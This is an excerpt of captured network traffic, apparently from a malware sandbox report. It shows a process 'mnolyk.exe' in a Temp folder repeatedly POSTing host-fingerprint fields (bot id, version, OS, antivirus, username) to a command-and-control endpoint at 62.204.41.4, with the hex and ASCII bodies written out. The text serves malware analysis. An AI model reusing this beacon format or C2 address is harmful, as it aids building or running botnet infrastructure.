                                                                    Date: Wed, 08 Feb 2023 20:31:58 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    149192.168.2.34985162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:58.949709892 CET350OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:59.014894009 CET350INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:58 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    15192.168.2.34971662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:14.532463074 CET216OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:14.598109961 CET216INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:14 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    150192.168.2.34985262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:59.185303926 CET351OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:59.249834061 CET351INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:59 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    151192.168.2.34985362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:59.419398069 CET352OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:59.483755112 CET352INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:59 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    152192.168.2.34985462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:59.659125090 CET353OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:59.722232103 CET353INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:59 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    153192.168.2.34985562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:59.888895035 CET354OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:59.953712940 CET354INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:59 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    154192.168.2.34985662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:00.132401943 CET355OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:00.197011948 CET355INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:00 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    155192.168.2.34985762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:00.376327991 CET356OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:00.440331936 CET356INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:00 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    156192.168.2.34985862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:00.606919050 CET357OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:00.671504974 CET357INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:00 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    157192.168.2.34985962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:00.842849970 CET358OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:00.908272982 CET358INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:00 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    158192.168.2.34986062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:01.115035057 CET359OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:01.181586027 CET359INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:01 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    159192.168.2.34986162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:01.357770920 CET360OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:01.421011925 CET360INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:01 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    16192.168.2.34971762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:14.890075922 CET217OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:14.955146074 CET217INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:14 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    160192.168.2.34986262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:01.593617916 CET361OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:01.659683943 CET361INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:01 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    161192.168.2.34986362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:01.828272104 CET362OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:01.892541885 CET362INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:01 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    162192.168.2.34986462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:02.060205936 CET363OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:02.125123978 CET363INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:02 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    163192.168.2.34986562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:02.300344944 CET364OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:02.371283054 CET364INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:02 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    164192.168.2.34986662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:02.560496092 CET365OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:02.622514963 CET365INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:02 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    165192.168.2.34986762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:02.794106007 CET366OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:02.858184099 CET366INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:02 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    166192.168.2.34986862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:03.033762932 CET367OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
